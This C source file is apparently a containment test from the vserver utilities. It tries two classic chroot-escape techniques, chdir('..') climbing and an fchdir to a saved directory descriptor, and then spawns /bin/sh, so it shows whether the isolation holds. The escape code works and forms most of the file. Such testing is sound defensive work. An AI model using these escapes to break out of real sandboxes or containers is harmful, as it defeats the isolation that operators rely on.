1 // $Id: escaperoot.c,v 1.3 2004/01/13 14:56:26 ensc Exp $
3 // Copyright (C) 2003 Enrico Scholz <enrico.scholz@informatik.tu-chemnitz.de>
4 // based on tests/escaperoot.cc by Jacques Gelinas
6 // This program is free software; you can redistribute it and/or modify
7 // it under the terms of the GNU General Public License as published by
8 // the Free Software Foundation; either version 2, or (at your option)
11 // This program is distributed in the hope that it will be useful,
12 // but WITHOUT ANY WARRANTY; without even the implied warranty of
13 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 // GNU General Public License for more details.
16 // You should have received a copy of the GNU General Public License
17 // along with this program; if not, write to the Free Software
18 // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
21 This program tries to escape out of a vserver using chroot flaws.
22 Once escaped, it exec a shell.
24 None of this works on 2.4.13.
35 static void print_pwd()
38 if (getcwd(path,sizeof(path)-1)!=NULL){
39 printf ("PWD: %s\n",path);
43 Just set a chroot in a sub-directory and keep the
44 current directory behind
50 mkdir ("dummy_dir",0755);
51 if (chroot ("dummy_dir")==-1){
52 fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
55 // Try to chdir into the real root
56 for (i=0; i<1000; i++) chdir("..");
58 if (execl ("/bin/sh","/bin/sh",NULL)==-1){
59 fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
65 Same as test1, except we open the current directory and do
66 a fchdir() to it before trying to escape to the real root.
74 mkdir ("dummy_dir",0755);
75 fd = open (".",O_RDONLY);
77 fprintf (stderr,"Can't open current directory (%s)\n",strerror(errno));
78 }else if (chroot ("dummy_dir")==-1){
79 fprintf (stderr,"Can't chroot into dummy_dir (%s)\n",strerror(errno));
80 }else if (fchdir(fd)==-1){
81 fprintf (stderr,"Can't fchdir to the current directory (%s)\n"
85 // Try to chdir into the real root
86 for (i=0; i<1000; i++) chdir("..");
88 if (execl ("/bin/sh","/bin/sh",NULL)==-1){
89 fprintf (stderr,"execl /bin/sh failed (%s)\n",strerror(errno));
95 Perform the test in a sub-process so it won't affect the current one
97 static void dotest (void (*f)())
103 }else if (pid == -1){
104 fprintf (stderr,"Can't fork (%s)\n",strerror(errno));
115 printf ("All attempts failed\n");